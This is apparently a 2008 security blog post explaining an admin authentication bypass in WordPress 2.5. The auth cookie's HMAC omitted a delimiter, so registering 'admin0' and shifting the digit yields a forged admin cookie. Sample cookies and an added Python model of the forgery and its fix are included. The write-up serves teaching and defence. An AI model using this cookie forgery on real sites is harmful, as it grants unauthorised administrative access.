Admin Authentication Bypass in WordPress 2.5

Steven J. Murdoch has a great post about an admin cookie authentication bypass in WordPress 2.5. It provides an instructive look at how simple it is to improperly implement cryptographic functions.

The basic premise is that in WordPress 2.5, an HMAC was used to provide integrity protection for the authentication cookie, but a design flaw allows specially chosen user names to create forged authentication cookies.

The auth cookie allows a user to log in without any complicated session management on the server side by storing the user login, expiration time and hash value. A valid auth cookie grants a user the ability to log in without any form of password. So, if a forged auth cookie could be generated such that the user login field was "admin", then that given user would have administrative privileges.

The auth cookie value is of the format:

      $user_login . '|' . $expiration . '|' . $hash

where the hash was the HMAC derived from the SECRET_KEY defined in the configuration.

The design mistake was that the HMAC was calculated over the undelimited value:

      $user_login . $expiration

Consequently, an appropriately chosen user name could be registered that would allow access to the admin account by tampering with the cookie.

In order to choose an appropriate user name, the following criteria need to be met:

  1. The user name must begin with the string "admin"
  2. The expiration must not be in the past
  3. When the user name and expiration are concatenated, the original value used to calculate the HMAC must be unchanged.

Obviously, the simplest choice for a user name would be "admin0". For example, when the HMAC was initially calculated, the value:

      "admin0" . "1209590828"

would result in a cookie value of:

      admin0|1209590828|7863a08bd04af260bd5df2a8bf7e8b33

Then, the cookie is modified by moving the 0 to the expiration field:

      admin|01209590828|7863a08bd04af260bd5df2a8bf7e8b33

so that the HMAC is calculated over:

      "admin" . "01209590828"

Since the concatenated strings are identical, the HMAC hash is matched and the user is granted admin privileges.
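The following is an added example (not code from the post or from WordPress) that models the cookie scheme described above: a validator that MACs the undelimited concatenation accepts the shifted "admin0" cookie as "admin", while one that includes the "|" delimiter in the MAC'd message rejects it. The secret key is constructed, and md5 is assumed as the HMAC hash to match the 32-hex-character digest shown in the post.

```python
import hmac
import hashlib

# Constructed secret for the example; WordPress reads SECRET_KEY from wp-config.php.
SECRET_KEY = b"constructed-example-secret-key"


def _digest(msg: str) -> str:
    # md5 assumed here only to match the 32-hex digest length in the post.
    return hmac.new(SECRET_KEY, msg.encode(), hashlib.md5).hexdigest()


def make_cookie_naive(user_login: str, expiration: str) -> str:
    """WordPress 2.5 style: the HMAC covers $user_login . $expiration with no delimiter."""
    return f"{user_login}|{expiration}|{_digest(user_login + expiration)}"


def make_cookie_fixed(user_login: str, expiration: str) -> str:
    """Hardened variant (one possible fix): the delimiter is part of the MAC'd message,
    so the field boundary itself is authenticated."""
    return f"{user_login}|{expiration}|{_digest(user_login + '|' + expiration)}"


def validate(cookie: str, delimited: bool, now: int):
    """Return the authenticated login, or None if the cookie is rejected."""
    try:
        user_login, expiration, given = cookie.split("|")
    except ValueError:
        return None
    # Note that int("01209590828") == int("1209590828"): a leading zero does not change
    # the expiration, which is why the shifted cookie passes the expiry check.
    if not expiration.isdigit() or int(expiration) < now:
        return None
    msg = user_login + "|" + expiration if delimited else user_login + expiration
    if not hmac.compare_digest(_digest(msg), given):
        return None
    return user_login


def shift_trailing_digits(cookie: str) -> str:
    """Move the trailing digits of the login field into the expiration field,
    exactly as the post does with admin0|1209590828|... -> admin|01209590828|..."""
    user_login, expiration, h = cookie.split("|")
    stripped = user_login.rstrip("0123456789")
    moved = user_login[len(stripped):]
    return f"{stripped}|{moved}{expiration}|{h}"


def demo(now: int = 1209590000):
    """Returns (naive verdict on real cookie, naive verdict on shifted cookie, fixed verdict on shifted cookie)."""
    naive = make_cookie_naive("admin0", "1209590828")
    fixed = make_cookie_fixed("admin0", "1209590828")
    return (validate(naive, False, now),
            validate(shift_trailing_digits(naive), False, now),
            validate(shift_trailing_digits(fixed), True, now))
```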

A simple implementation mistake with serious consequences.

Posted by gfleischer on 2008/04/28 at 20:46 in 0wned
